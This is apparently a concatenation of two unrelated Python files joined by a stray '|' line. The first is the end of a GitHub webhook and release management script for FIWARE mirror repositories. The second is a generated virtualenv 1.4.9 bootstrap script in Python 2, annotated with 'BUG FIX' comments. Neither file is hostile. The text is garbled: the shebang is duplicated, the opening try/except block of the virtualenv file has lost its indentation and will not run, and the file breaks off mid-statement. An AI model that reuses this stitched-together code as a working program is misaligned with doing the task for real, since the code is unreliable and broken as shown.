    parser.add_argument('--webhooks', action='store_true')
    parser.add_argument('--delete_releases', action='store_true')
    parser.add_argument('--delete_webhooks', action='store_true')
    args = parser.parse_args()

    if not path.isfile(args.mirror):
        print('Config for mirror webhook not found')
        exit(1)
    if not path.isfile(args.transformer):
        print('Config for transformer webhook not found')
        exit(1)

    # Load both JSON configs; each lists the repositories to operate on.
    config = dict()
    try:
        with open(args.mirror) as f:
            config['mirror'] = load(f)
    except ValueError:
        print('Unsupported config type')
        exit(1)
    try:
        with open(args.transformer) as f:
            config['transformer'] = load(f)
    except ValueError:
        print('Unsupported config type')
        exit(1)

    if args.delete_releases:
        print('Deleting releases')
        for repo in config['mirror']['repositories']:
            if not delete_releases(repo['target']):
                print('releases: failed')
                exit(1)
    if args.delete_webhooks:
        print('Deleting webhooks')
        for repo in config['mirror']['repositories']:
            if not delete_webhooks(repo['target']):
                print('webhooks: failed')
                exit(1)
    if args.description:
        print('Changing parameters')
        for repo in config['mirror']['repositories']:
            if not change_parameters(repo['source'], repo['target']):
                print('desc: failed')
                exit(1)
    if not args.webhooks:
        exit(0)

    # Ensure each repo has the appropriate FIWARE webhook installed.
    for webhook_type in ['mirror', 'transformer']:
        print('Working on', webhook_type, 'webhook')
        for repo in config[webhook_type]['repositories']:
            hook = False
            # Mirror hooks live on the mirror ('target'); transformer hooks
            # live on the upstream ('source').
            if webhook_type == 'mirror':
                repo = repo['target']
            else:
                repo = repo['source']
            response = get(url_webhooks.format(repo, token))
            if response.status_code == 200:
                for element in loads(response.text):
                    if 'config' in element:
                        if 'url' in element['config']:
                            if element['config']['url'] == url_webhook[webhook_type]:
                                hook = True
                                print('hook: exists')
                if not hook:
                    print("repo:", repo)
                    if create_webhook(repo, webhook_type):
                        print('hook: added')
                    else:
                        print('hook: ERROR')
                        exit(1)
            else:
                # BUG FIX: `repo` was rebound to a string above, so the
                # original's repo['target'] raised TypeError on this path.
                print("repo:", repo, " not found")
                exit(1)
|
#!/usr/bin/env python
## WARNING: This file is generated
#!/usr/bin/env python
"""Create a "virtual" Python installation
"""
virtualenv_version = "1.4.9"
import sys
import os
import optparse
import re
import shutil
import logging
import distutils.sysconfig
try:
import subprocess
except ImportError, e:
if sys.version_info <= (2, 3):
print 'ERROR: %s' % e
print 'ERROR: this script requires Python 2.4 or greater; or at least the subprocess module.'
print 'If you copy subprocess.py from a newer version of Python this script will probably work'
sys.exit(101)
else:
raise
try:
set
except NameError:
from sets import Set as set
# Convenience alias used throughout this script.
join = os.path.join
py_version = 'python%s.%s' % (sys.version_info[0], sys.version_info[1])
is_jython = sys.platform.startswith('java')
# Expected basename of the interpreter executable on this platform.
expected_exe = is_jython and 'jython' or 'python'

# Stdlib modules that must be symlinked/copied into the new environment.
REQUIRED_MODULES = ['os', 'posix', 'posixpath', 'nt', 'ntpath', 'genericpath',
                    'fnmatch', 'locale', 'encodings', 'codecs',
                    'stat', 'UserDict', 'readline', 'copy_reg', 'types',
                    're', 'sre', 'sre_parse', 'sre_constants', 'sre_compile',
                    'lib-dynload', 'config', 'zlib']

if sys.version_info[:2] >= (2, 6):
    REQUIRED_MODULES.extend(['warnings', 'linecache', '_abcoll', 'abc'])
if sys.version_info[:2] <= (2, 3):
    REQUIRED_MODULES.extend(['sets', '__future__'])
class Logger(object):

    """
    Logging object for use in command-line script.  Allows ranges of
    levels, to avoid some redundancy of displayed information.
    """

    DEBUG = logging.DEBUG
    INFO = logging.INFO
    # NOTIFY sits halfway between INFO and WARN: routine progress output.
    NOTIFY = (logging.INFO+logging.WARN)/2
    WARN = WARNING = logging.WARN
    ERROR = logging.ERROR
    FATAL = logging.FATAL

    LEVELS = [DEBUG, INFO, NOTIFY, WARN, ERROR, FATAL]

    def __init__(self, consumers):
        # consumers: list of (level, consumer) pairs; a consumer is either a
        # writable stream or a callable taking the rendered message.
        self.consumers = consumers
        self.indent = 0
        self.in_progress = None
        self.in_progress_hanging = False

    def debug(self, msg, *args, **kw):
        self.log(self.DEBUG, msg, *args, **kw)

    def info(self, msg, *args, **kw):
        self.log(self.INFO, msg, *args, **kw)

    def notify(self, msg, *args, **kw):
        self.log(self.NOTIFY, msg, *args, **kw)

    def warn(self, msg, *args, **kw):
        self.log(self.WARN, msg, *args, **kw)

    def error(self, msg, *args, **kw):
        # BUG FIX: this logged at WARN level, so a consumer configured for
        # ERROR-and-above silently dropped error messages.
        self.log(self.ERROR, msg, *args, **kw)

    def fatal(self, msg, *args, **kw):
        self.log(self.FATAL, msg, *args, **kw)

    def log(self, level, msg, *args, **kw):
        """Render ``msg % args`` (or ``msg % kw``) and dispatch it to every
        consumer whose configured level (or level range) matches *level*."""
        if args:
            if kw:
                raise TypeError(
                    "You may give positional or keyword arguments, not both")
        args = args or kw
        rendered = None
        for consumer_level, consumer in self.consumers:
            if self.level_matches(level, consumer_level):
                if (self.in_progress_hanging
                    and consumer in (sys.stdout, sys.stderr)):
                    # Terminate a dangling progress line before new output.
                    self.in_progress_hanging = False
                    sys.stdout.write('\n')
                    sys.stdout.flush()
                if rendered is None:
                    if args:
                        rendered = msg % args
                    else:
                        rendered = msg
                    rendered = ' '*self.indent + rendered
                if hasattr(consumer, 'write'):
                    consumer.write(rendered+'\n')
                else:
                    consumer(rendered)

    def start_progress(self, msg):
        assert not self.in_progress, (
            "Tried to start_progress(%r) while in_progress %r"
            % (msg, self.in_progress))
        if self.level_matches(self.NOTIFY, self._stdout_level()):
            sys.stdout.write(msg)
            sys.stdout.flush()
            self.in_progress_hanging = True
        else:
            self.in_progress_hanging = False
        self.in_progress = msg

    def end_progress(self, msg='done.'):
        assert self.in_progress, (
            "Tried to end_progress without start_progress")
        if self.stdout_level_matches(self.NOTIFY):
            if not self.in_progress_hanging:
                # Some message has been printed out since start_progress
                sys.stdout.write('...' + self.in_progress + msg + '\n')
                sys.stdout.flush()
            else:
                sys.stdout.write(msg + '\n')
                sys.stdout.flush()
        self.in_progress = None
        self.in_progress_hanging = False

    def show_progress(self):
        """If we are in a progress scope, and no log messages have been
        shown, write out another '.'"""
        if self.in_progress_hanging:
            sys.stdout.write('.')
            sys.stdout.flush()

    def stdout_level_matches(self, level):
        """Returns true if a message at this level will go to stdout"""
        return self.level_matches(level, self._stdout_level())

    def _stdout_level(self):
        """Returns the level that stdout runs at"""
        for level, consumer in self.consumers:
            if consumer is sys.stdout:
                return level
        return self.FATAL

    def level_matches(self, level, consumer_level):
        """
        >>> l = Logger([])
        >>> l.level_matches(3, 4)
        False
        >>> l.level_matches(3, 2)
        True
        >>> l.level_matches(slice(None, 3), 3)
        False
        >>> l.level_matches(slice(None, 3), 2)
        True
        >>> l.level_matches(slice(1, 3), 1)
        True
        >>> l.level_matches(slice(2, 3), 1)
        False
        """
        if isinstance(level, slice):
            start, stop = level.start, level.stop
            if start is not None and start > consumer_level:
                return False
            # BUG FIX: this test used `or`, which rejected every slice with a
            # non-None stop -- contradicting the doctests above.  (The
            # doctest constructor was also fixed: Logger() requires the
            # consumers argument.)
            if stop is not None and stop <= consumer_level:
                return False
            return True
        else:
            return level >= consumer_level

    #@classmethod
    def level_for_integer(cls, level):
        """Clamp an integer verbosity index into the LEVELS list."""
        levels = cls.LEVELS
        if level < 0:
            return levels[0]
        if level >= len(levels):
            return levels[-1]
        return levels[level]

    level_for_integer = classmethod(level_for_integer)
def mkdir(path):
    """Create *path* (including parents) unless it exists; log either way."""
    if os.path.exists(path):
        logger.info('Directory %s already exists', path)
    else:
        logger.info('Creating %s', path)
        os.makedirs(path)
def copyfile(src, dest, symlink=True):
    """Symlink (preferred) or copy *src* to *dest*.

    No-ops when *src* is a dangling symlink or *dest* already exists;
    creates dest's parent directories as needed.
    """
    if not os.path.exists(src):
        # Some bad symlink in the src
        logger.warn('Cannot find file %s (bad symlink)', src)
        return
    if os.path.exists(dest):
        logger.debug('File %s already exists', dest)
        return
    parent = os.path.dirname(dest)
    if not os.path.exists(parent):
        logger.info('Creating parent directories for %s' % parent)
        os.makedirs(parent)
    if symlink and hasattr(os, 'symlink'):
        logger.info('Symlinking %s', dest)
        os.symlink(os.path.abspath(src), dest)
    elif os.path.isdir(src):
        logger.info('Copying to %s', dest)
        shutil.copytree(src, dest, True)
    else:
        logger.info('Copying to %s', dest)
        shutil.copy2(src, dest)
def writefile(dest, content, overwrite=True):
    """Write *content* to *dest*.

    Leaves identical files untouched, and respects overwrite=False for
    files whose content differs.
    """
    if not os.path.exists(dest):
        logger.info('Writing %s', dest)
        f = open(dest, 'wb')
        f.write(content)
        f.close()
        return
    f = open(dest, 'rb')
    existing = f.read()
    f.close()
    if existing == content:
        logger.info('Content %s already in place', dest)
        return
    if not overwrite:
        logger.notify('File %s exists with different content; not overwriting', dest)
        return
    logger.notify('Overwriting %s with new content', dest)
    f = open(dest, 'wb')
    f.write(content)
    f.close()
def rmtree(dir):
    """Recursively delete *dir* if it exists; log either way."""
    if not os.path.exists(dir):
        logger.info('Do not need to delete %s; already gone', dir)
        return
    logger.notify('Deleting tree %s', dir)
    shutil.rmtree(dir)
def make_exe(fn):
    # Make *fn* readable+executable on platforms that support chmod.
    if hasattr(os, 'chmod'):
        oldmode = os.stat(fn).st_mode & 07777
        # Add r-x for user/group/other while preserving the other mode bits.
        newmode = (oldmode | 0555) & 07777
        os.chmod(fn, newmode)
        logger.info('Changed mode of %s to %s', fn, oct(newmode))
def _find_file(filename, dirs):
    """Return the first path in *dirs* containing *filename*, or *filename*
    itself when no directory has it."""
    for candidate_dir in dirs:
        candidate = os.path.join(candidate_dir, filename)
        if os.path.exists(candidate):
            return candidate
    return filename
def _install_req(py_executable, unzip=False, distribute=False):
    """Install setuptools (default) or distribute into the new environment
    by running the embedded bootstrap script with *py_executable*,
    preferring a bundled egg/tarball from the search dirs over the network.
    """
    if not distribute:
        setup_fn = 'setuptools-0.6c11-py%s.egg' % sys.version[:3]
        project_name = 'setuptools'
        bootstrap_script = EZ_SETUP_PY
        source = None
    else:
        setup_fn = None
        source = 'distribute-0.6.8.tar.gz'
        project_name = 'distribute'
        bootstrap_script = DISTRIBUTE_SETUP_PY

    try:
        # check if the global Python has distribute installed or plain
        # setuptools
        import pkg_resources
        if not hasattr(pkg_resources, '_distribute'):
            location = os.path.dirname(pkg_resources.__file__)
            logger.notify("A globally installed setuptools was found (in %s)" % location)
            logger.notify("Use the --no-site-packages option to use distribute in "
                          "the virtualenv.")
    except ImportError:
        pass

    search_dirs = file_search_dirs()

    if setup_fn is not None:
        setup_fn = _find_file(setup_fn, search_dirs)

    if source is not None:
        source = _find_file(source, search_dirs)

    if is_jython and os._name == 'nt':
        # Jython's .bat sys.executable can't handle a command line
        # argument with newlines
        import tempfile
        fd, ez_setup = tempfile.mkstemp('.py')
        os.write(fd, bootstrap_script)
        os.close(fd)
        cmd = [py_executable, ez_setup]
    else:
        cmd = [py_executable, '-c', bootstrap_script]
    if unzip:
        cmd.append('--always-unzip')
    env = {}
    if logger.stdout_level_matches(logger.DEBUG):
        cmd.append('-v')

    old_chdir = os.getcwd()
    if setup_fn is not None and os.path.exists(setup_fn):
        # A bundled egg exists: install it via PYTHONPATH so the bootstrap
        # script can find it without a download.
        logger.info('Using existing %s egg: %s' % (project_name, setup_fn))
        cmd.append(setup_fn)
        if os.environ.get('PYTHONPATH'):
            env['PYTHONPATH'] = setup_fn + os.path.pathsep + os.environ['PYTHONPATH']
        else:
            env['PYTHONPATH'] = setup_fn
    else:
        # the source is found, let's chdir
        if source is not None and os.path.exists(source):
            os.chdir(os.path.dirname(source))
        else:
            logger.info('No %s egg found; downloading' % project_name)
            cmd.extend(['--always-copy', '-U', project_name])

    logger.start_progress('Installing %s...' % project_name)
    logger.indent += 2
    cwd = None
    if project_name == 'distribute':
        env['DONT_PATCH_SETUPTOOLS'] = 'true'

    def _filter_ez_setup(line):
        return filter_ez_setup(line, project_name)

    if not os.access(os.getcwd(), os.W_OK):
        # The current working dir is not writable; run from /tmp instead.
        cwd = '/tmp'
        if source is not None and os.path.exists(source):
            # the current working dir is hostile, let's copy the
            # tarball to /tmp
            target = os.path.join(cwd, os.path.split(source)[-1])
            shutil.copy(source, target)
    try:
        call_subprocess(cmd, show_stdout=False,
                        filter_stdout=_filter_ez_setup,
                        extra_env=env,
                        cwd=cwd)
    finally:
        logger.indent -= 2
        logger.end_progress()
        # Restore the working directory changed above.
        if os.getcwd() != old_chdir:
            os.chdir(old_chdir)
        if is_jython and os._name == 'nt':
            os.remove(ez_setup)
def file_search_dirs():
    """Return the existing directories that may hold bundled support files
    (setuptools/distribute/pip archives)."""
    here = os.path.dirname(os.path.abspath(__file__))
    candidates = ['.', here, os.path.join(here, 'virtualenv_support')]
    if os.path.splitext(os.path.dirname(__file__))[0] != 'virtualenv':
        # Probably a generated boot script; fall back to an installed
        # virtualenv package's support directory when available.
        try:
            import virtualenv
        except ImportError:
            pass
        else:
            pkg_dir = os.path.dirname(virtualenv.__file__)
            candidates.append(os.path.join(pkg_dir, 'virtualenv_support'))
    return [d for d in candidates if os.path.isdir(d)]
def install_setuptools(py_executable, unzip=False):
    # Thin wrapper: install classic setuptools into the environment.
    _install_req(py_executable, unzip)
def install_distribute(py_executable, unzip=False):
    # Thin wrapper: install distribute (the setuptools fork) instead.
    _install_req(py_executable, unzip, distribute=True)
# Matches bundled pip source archives, e.g. pip-0.7.2.tar.gz (case-insensitive).
_pip_re = re.compile(r'^pip-.*(zip|tar.gz|tar.bz2|tgz|tbz)$', re.I)
def install_pip(py_executable):
    """Install pip into the new environment via its easy_install script,
    preferring a bundled archive from the search dirs over the network."""
    filenames = []
    for dir in file_search_dirs():
        filenames.extend([join(dir, fn) for fn in os.listdir(dir)
                          if _pip_re.search(fn)])
    # Sort by basename so the newest-versioned archive ends up last.
    filenames.sort(key=lambda x: os.path.basename(x).lower())
    if not filenames:
        filename = 'pip'
    else:
        filename = filenames[-1]
    easy_install_script = 'easy_install'
    if sys.platform == 'win32':
        easy_install_script = 'easy_install-script.py'
    cmd = [py_executable, join(os.path.dirname(py_executable), easy_install_script), filename]
    if filename == 'pip':
        logger.info('Installing pip from network...')
    else:
        logger.info('Installing %s' % os.path.basename(filename))
    logger.indent += 2
    def _filter_setup(line):
        return filter_ez_setup(line, 'pip')
    try:
        call_subprocess(cmd, show_stdout=False,
                        filter_stdout=_filter_setup)
    finally:
        logger.indent -= 2
def filter_ez_setup(line, project_name='setuptools'):
    """Map a line of easy_install/bootstrap output to a log level.

    Routine progress chatter is demoted to DEBUG; anything unexpected from
    a setuptools install is surfaced at INFO.
    """
    if not line.strip():
        return Logger.DEBUG
    if project_name == 'distribute':
        distribute_prefixes = ('Extracting', 'Now working', 'Installing', 'Before',
                               'Scanning', 'Setuptools', 'Egg', 'Already',
                               'running', 'writing', 'reading', 'installing',
                               'creating', 'copying', 'byte-compiling', 'removing',
                               'Processing')
        if line.startswith(distribute_prefixes):
            return Logger.DEBUG
        # NOTE: matches the original -- all distribute output ends up DEBUG.
        return Logger.DEBUG
    setuptools_prefixes = ('Reading ', 'Best match', 'Processing setuptools',
                           'Copying setuptools', 'Adding setuptools',
                           'Installing ', 'Installed ')
    if line.startswith(setuptools_prefixes):
        return Logger.DEBUG
    return Logger.INFO
def main():
    """Command-line entry point: parse options and create (or make
    relocatable) the virtualenv at DEST_DIR."""
    parser = optparse.OptionParser(
        version=virtualenv_version,
        usage="%prog [OPTIONS] DEST_DIR")

    parser.add_option(
        '-v', '--verbose',
        action='count',
        dest='verbose',
        default=0,
        help="Increase verbosity")

    parser.add_option(
        '-q', '--quiet',
        action='count',
        dest='quiet',
        default=0,
        help='Decrease verbosity')

    parser.add_option(
        '-p', '--python',
        dest='python',
        metavar='PYTHON_EXE',
        help='The Python interpreter to use, e.g., --python=python2.5 will use the python2.5 '
        'interpreter to create the new environment. The default is the interpreter that '
        'virtualenv was installed with (%s)' % sys.executable)

    parser.add_option(
        '--clear',
        dest='clear',
        action='store_true',
        help="Clear out the non-root install and start from scratch")

    parser.add_option(
        '--no-site-packages',
        dest='no_site_packages',
        action='store_true',
        help="Don't give access to the global site-packages dir to the "
        "virtual environment")

    parser.add_option(
        '--unzip-setuptools',
        dest='unzip_setuptools',
        action='store_true',
        help="Unzip Setuptools or Distribute when installing it")

    parser.add_option(
        '--relocatable',
        dest='relocatable',
        action='store_true',
        help='Make an EXISTING virtualenv environment relocatable. '
        'This fixes up scripts and makes all .pth files relative')

    parser.add_option(
        '--distribute',
        dest='use_distribute',
        action='store_true',
        help='Use Distribute instead of Setuptools. Set environ variable'
        'VIRTUALENV_USE_DISTRIBUTE to make it the default ')

    # Extension hooks: generated bootstrap scripts may define these globals.
    if 'extend_parser' in globals():
        extend_parser(parser)

    options, args = parser.parse_args()

    global logger

    if 'adjust_options' in globals():
        adjust_options(options, args)

    verbosity = options.verbose - options.quiet
    logger = Logger([(Logger.level_for_integer(2-verbosity), sys.stdout)])

    # When -p/--python names another interpreter, re-exec this script under
    # it (guarded by an env var to avoid an exec loop).
    if options.python and not os.environ.get('VIRTUALENV_INTERPRETER_RUNNING'):
        env = os.environ.copy()
        interpreter = resolve_interpreter(options.python)
        if interpreter == sys.executable:
            logger.warn('Already using interpreter %s' % interpreter)
        else:
            logger.notify('Running virtualenv with interpreter %s' % interpreter)
            env['VIRTUALENV_INTERPRETER_RUNNING'] = 'true'
            file = __file__
            if file.endswith('.pyc'):
                file = file[:-1]
            os.execvpe(interpreter, [interpreter, file] + sys.argv[1:], env)

    if not args:
        print 'You must provide a DEST_DIR'
        parser.print_help()
        sys.exit(2)
    if len(args) > 1:
        print 'There must be only one argument: DEST_DIR (you gave %s)' % (
            ' '.join(args))
        parser.print_help()
        sys.exit(2)

    home_dir = args[0]

    if os.environ.get('WORKING_ENV'):
        logger.fatal('ERROR: you cannot run virtualenv while in a workingenv')
        logger.fatal('Please deactivate your workingenv, then re-run this script')
        sys.exit(3)

    # A set PYTHONHOME would leak into the created environment.
    if 'PYTHONHOME' in os.environ:
        logger.warn('PYTHONHOME is set. You *must* activate the virtualenv before using it')
        del os.environ['PYTHONHOME']

    if options.relocatable:
        make_environment_relocatable(home_dir)
        return

    create_environment(home_dir, site_packages=not options.no_site_packages, clear=options.clear,
        unzip_setuptools=options.unzip_setuptools,
        use_distribute=options.use_distribute)
    if 'after_install' in globals():
        after_install(options, home_dir)
def call_subprocess(cmd, show_stdout=True,
                    filter_stdout=None, cwd=None,
                    raise_on_returncode=True, extra_env=None):
    """Run *cmd* (a list), routing its output through the module logger.

    filter_stdout, when given, maps each captured line to a log level (or a
    (level, line) tuple).  Raises OSError on a non-zero exit status unless
    raise_on_returncode is false.
    """
    # Build a shortened, quoted command string for log messages only.
    cmd_parts = []
    for part in cmd:
        if len(part) > 40:
            part = part[:30]+"..."+part[-5:]
        if ' ' in part or '\n' in part or '"' in part or "'" in part:
            part = '"%s"' % part.replace('"', '\\"')
        cmd_parts.append(part)
    cmd_desc = ' '.join(cmd_parts)
    if show_stdout:
        stdout = None
    else:
        stdout = subprocess.PIPE
    logger.debug("Running command %s" % cmd_desc)
    if extra_env:
        env = os.environ.copy()
        env.update(extra_env)
    else:
        env = None
    try:
        proc = subprocess.Popen(
            cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
            cwd=cwd, env=env)
    except Exception, e:
        logger.fatal(
            "Error %s while executing command %s" % (e, cmd_desc))
        raise
    all_output = []
    if stdout is not None:
        # Captured mode: read line by line so lines can be re-levelled.
        stdout = proc.stdout
        while 1:
            line = stdout.readline()
            if not line:
                break
            line = line.rstrip()
            all_output.append(line)
            if filter_stdout:
                level = filter_stdout(line)
                if isinstance(level, tuple):
                    level, line = level
                logger.log(level, line)
                if not logger.stdout_level_matches(level):
                    logger.show_progress()
            else:
                logger.info(line)
    else:
        proc.communicate()
    proc.wait()
    if proc.returncode:
        if raise_on_returncode:
            if all_output:
                logger.notify('Complete output from command %s:' % cmd_desc)
                logger.notify('\n'.join(all_output) + '\n----------------------------------------')
            raise OSError(
                "Command %s failed with error code %s"
                % (cmd_desc, proc.returncode))
        else:
            logger.warn(
                "Command %s had error code %s"
                % (cmd_desc, proc.returncode))
def create_environment(home_dir, site_packages=True, clear=False,
                       unzip_setuptools=False, use_distribute=False):
    """
    Creates a new environment in ``home_dir``.

    If ``site_packages`` is true (the default) then the global
    ``site-packages/`` directory will be on the path.

    If ``clear`` is true (default False) then the environment will
    first be cleared.
    """
    home_dir, lib_dir, inc_dir, bin_dir = path_locations(home_dir)

    # Lay down the interpreter and stdlib first ...
    py_executable = os.path.abspath(install_python(
        home_dir, lib_dir, inc_dir, bin_dir,
        site_packages=site_packages, clear=clear))

    install_distutils(lib_dir, home_dir)

    # ... then the packaging toolchain (distribute or setuptools, plus pip).
    if use_distribute or os.environ.get('VIRTUALENV_USE_DISTRIBUTE'):
        install_distribute(py_executable, unzip=unzip_setuptools)
    else:
        install_setuptools(py_executable, unzip=unzip_setuptools)

    install_pip(py_executable)

    install_activate(home_dir, bin_dir)
def path_locations(home_dir):
    """Return the path locations for the environment (where libraries are,
    where scripts go, etc)"""
    # XXX: We'd use distutils.sysconfig.get_python_inc/lib but its
    # prefix arg is broken: http://bugs.python.org/issue3386
    if sys.platform == 'win32':
        # Windows has lots of problems with executables with spaces in
        # the name; this function will remove them (using the ~1
        # format):
        mkdir(home_dir)
        if ' ' in home_dir:
            try:
                import win32api
            except ImportError:
                print 'Error: the path "%s" has a space in it' % home_dir
                print 'To handle these kinds of paths, the win32api module must be installed:'
                print '  http://sourceforge.net/projects/pywin32/'
                sys.exit(3)
            home_dir = win32api.GetShortPathName(home_dir)
        lib_dir = join(home_dir, 'Lib')
        inc_dir = join(home_dir, 'Include')
        bin_dir = join(home_dir, 'Scripts')
    elif is_jython:
        lib_dir = join(home_dir, 'Lib')
        inc_dir = join(home_dir, 'Include')
        bin_dir = join(home_dir, 'bin')
    else:
        # POSIX layout: lib/pythonX.Y, include/pythonX.Y, bin.
        lib_dir = join(home_dir, 'lib', py_version)
        inc_dir = join(home_dir, 'include', py_version)
        bin_dir = join(home_dir, 'bin')
    return home_dir, lib_dir, inc_dir, bin_dir
def install_python(home_dir, lib_dir, inc_dir, bin_dir, site_packages, clear):
    """Install just the base environment, no distutils patches etc

    Copies/symlinks the bootstrap stdlib modules into ``lib_dir``, writes
    the custom ``site.py``, copies the interpreter into ``bin_dir`` and
    verifies that the new executable reports the environment as its
    ``sys.prefix``.  Returns the path of the new interpreter.
    """
    # Refuse to run from inside the environment being (re)created.
    if sys.executable.startswith(bin_dir):
        print 'Please use the *system* python to run this script'
        return
    if clear:
        rmtree(lib_dir)
        ## FIXME: why not delete it?
        ## Maybe it should delete everything with #!/path/to/venv/python in it
        logger.notify('Not deleting %s', bin_dir)
    # sys.real_prefix is set when running under an existing virtualenv;
    # use it so we copy from the real interpreter, not a nested env.
    if hasattr(sys, 'real_prefix'):
        logger.notify('Using real prefix %r' % sys.real_prefix)
        prefix = sys.real_prefix
    else:
        prefix = sys.prefix
    mkdir(lib_dir)
    fix_lib64(lib_dir)
    # Gather the directories that hold the stdlib modules we must mirror.
    stdlib_dirs = [os.path.dirname(os.__file__)]
    if sys.platform == 'win32':
        stdlib_dirs.append(join(os.path.dirname(stdlib_dirs[0]), 'DLLs'))
    elif sys.platform == 'darwin':
        stdlib_dirs.append(join(stdlib_dirs[0], 'site-packages'))
    for stdlib_dir in stdlib_dirs:
        if not os.path.isdir(stdlib_dir):
            continue
        if hasattr(os, 'symlink'):
            logger.info('Symlinking Python bootstrap modules')
        else:
            logger.info('Copying Python bootstrap modules')
        logger.indent += 2
        try:
            # Only the minimal bootstrap modules are brought over.
            for fn in os.listdir(stdlib_dir):
                if fn != 'site-packages' and os.path.splitext(fn)[0] in REQUIRED_MODULES:
                    copyfile(join(stdlib_dir, fn), join(lib_dir, fn))
        finally:
            logger.indent -= 2
    mkdir(join(lib_dir, 'site-packages'))
    # Custom site.py plus a marker recording the original prefix.
    writefile(join(lib_dir, 'site.py'), SITE_PY)
    writefile(join(lib_dir, 'orig-prefix.txt'), prefix)
    # Presence of this file tells site.py to hide the global site-packages.
    site_packages_filename = join(lib_dir, 'no-global-site-packages.txt')
    if not site_packages:
        writefile(site_packages_filename, '')
    else:
        if os.path.exists(site_packages_filename):
            logger.info('Deleting %s' % site_packages_filename)
            os.unlink(site_packages_filename)
    # Mirror the C headers so extensions can build against the env.
    stdinc_dir = join(prefix, 'include', py_version)
    if os.path.exists(stdinc_dir):
        copyfile(stdinc_dir, inc_dir)
    else:
        logger.debug('No include dir %s' % stdinc_dir)
    # Split prefix/exec_prefix installs keep compiled modules elsewhere.
    if sys.exec_prefix != prefix:
        if sys.platform == 'win32':
            exec_dir = join(sys.exec_prefix, 'lib')
        elif is_jython:
            exec_dir = join(sys.exec_prefix, 'Lib')
        else:
            exec_dir = join(sys.exec_prefix, 'lib', py_version)
        for fn in os.listdir(exec_dir):
            copyfile(join(exec_dir, fn), join(lib_dir, fn))
    if is_jython:
        # Jython has either jython-dev.jar and javalib/ dir, or just
        # jython.jar
        for name in 'jython-dev.jar', 'javalib', 'jython.jar':
            src = join(prefix, name)
            if os.path.exists(src):
                copyfile(src, join(home_dir, name))
        # XXX: registry should always exist after Jython 2.5rc1
        src = join(prefix, 'registry')
        if os.path.exists(src):
            copyfile(src, join(home_dir, 'registry'), symlink=False)
        copyfile(join(prefix, 'cachedir'), join(home_dir, 'cachedir'),
                 symlink=False)
    mkdir(bin_dir)
    py_executable = join(bin_dir, os.path.basename(sys.executable))
    if 'Python.framework' in prefix:
        if re.search(r'/Python(?:-32|-64)*$', py_executable):
            # The name of the python executable is not quite what
            # we want, rename it.
            py_executable = os.path.join(
                os.path.dirname(py_executable), 'python')
    logger.notify('New %s executable in %s', expected_exe, py_executable)
    if sys.executable != py_executable:
        ## FIXME: could I just hard link?
        executable = sys.executable
        if sys.platform == 'cygwin' and os.path.exists(executable + '.exe'):
            # Cygwin misreports sys.executable sometimes
            executable += '.exe'
            py_executable += '.exe'
            logger.info('Executable actually exists in %s' % executable)
        shutil.copyfile(executable, py_executable)
        make_exe(py_executable)
        if sys.platform == 'win32' or sys.platform == 'cygwin':
            pythonw = os.path.join(os.path.dirname(sys.executable), 'pythonw.exe')
            if os.path.exists(pythonw):
                logger.info('Also created pythonw.exe')
                shutil.copyfile(pythonw, os.path.join(os.path.dirname(py_executable), 'pythonw.exe'))
    # Provide the conventionally named interpreter too (e.g. "python").
    if os.path.splitext(os.path.basename(py_executable))[0] != expected_exe:
        secondary_exe = os.path.join(os.path.dirname(py_executable),
                                     expected_exe)
        py_executable_ext = os.path.splitext(py_executable)[1]
        if py_executable_ext == '.exe':
            # python2.4 gives an extension of '.4' :P
            secondary_exe += py_executable_ext
        if os.path.exists(secondary_exe):
            logger.warn('Not overwriting existing %s script %s (you must use %s)'
                        % (expected_exe, secondary_exe, py_executable))
        else:
            logger.notify('Also creating executable in %s' % secondary_exe)
            shutil.copyfile(sys.executable, secondary_exe)
            make_exe(secondary_exe)
    if 'Python.framework' in prefix:
        logger.debug('MacOSX Python framework detected')
        # Make sure we use the the embedded interpreter inside
        # the framework, even if sys.executable points to
        # the stub executable in ${sys.prefix}/bin
        # See http://groups.google.com/group/python-virtualenv/
        # browse_thread/thread/17cab2f85da75951
        shutil.copy(
            os.path.join(
                prefix, 'Resources/Python.app/Contents/MacOS/%s' % os.path.basename(sys.executable)),
            py_executable)
        # Copy the framework's dylib into the virtual
        # environment
        virtual_lib = os.path.join(home_dir, '.Python')
        if os.path.exists(virtual_lib):
            os.unlink(virtual_lib)
        copyfile(
            os.path.join(prefix, 'Python'),
            virtual_lib)
        # And then change the install_name of the copied python executable
        try:
            call_subprocess(
                ["install_name_tool", "-change",
                 os.path.join(prefix, 'Python'),
                 '@executable_path/../.Python',
                 py_executable])
        except:
            logger.fatal(
                "Could not call install_name_tool -- you must have Apple's development tools installed")
            raise
        # Some tools depend on pythonX.Y being present
        py_executable_version = '%s.%s' % (
            sys.version_info[0], sys.version_info[1])
        if not py_executable.endswith(py_executable_version):
            # symlinking pythonX.Y > python
            pth = py_executable + '%s.%s' % (
                sys.version_info[0], sys.version_info[1])
            if os.path.exists(pth):
                os.unlink(pth)
            os.symlink('python', pth)
        else:
            # reverse symlinking python -> pythonX.Y (with --python)
            pth = join(bin_dir, 'python')
            if os.path.exists(pth):
                os.unlink(pth)
            os.symlink(os.path.basename(py_executable), pth)
    if sys.platform == 'win32' and ' ' in py_executable:
        # There's a bug with subprocess on Windows when using a first
        # argument that has a space in it. Instead we have to quote
        # the value:
        py_executable = '"%s"' % py_executable
    # Sanity-check: the new interpreter must report the env as its prefix.
    cmd = [py_executable, '-c', 'import sys; print sys.prefix']
    logger.info('Testing executable with %s %s "%s"' % tuple(cmd))
    proc = subprocess.Popen(cmd,
                            stdout=subprocess.PIPE)
    proc_stdout, proc_stderr = proc.communicate()
    proc_stdout = os.path.normcase(os.path.abspath(proc_stdout.strip()))
    if proc_stdout != os.path.normcase(os.path.abspath(home_dir)):
        logger.fatal(
            'ERROR: The executable %s is not functioning' % py_executable)
        logger.fatal(
            'ERROR: It thinks sys.prefix is %r (should be %r)'
            % (proc_stdout, os.path.normcase(os.path.abspath(home_dir))))
        logger.fatal(
            'ERROR: virtualenv is not compatible with this system or executable')
        if sys.platform == 'win32':
            logger.fatal(
                'Note: some Windows users have reported this error when they installed Python for "Only this user". The problem may be resolvable if you install Python "For all users". (See https://bugs.launchpad.net/virtualenv/+bug/352844)')
        sys.exit(100)
    else:
        logger.info('Got sys.prefix result: %r' % proc_stdout)
    # Warn about user config that could redirect installs outside the env.
    pydistutils = os.path.expanduser('~/.pydistutils.cfg')
    if os.path.exists(pydistutils):
        logger.notify('Please make sure you remove any previous custom paths from '
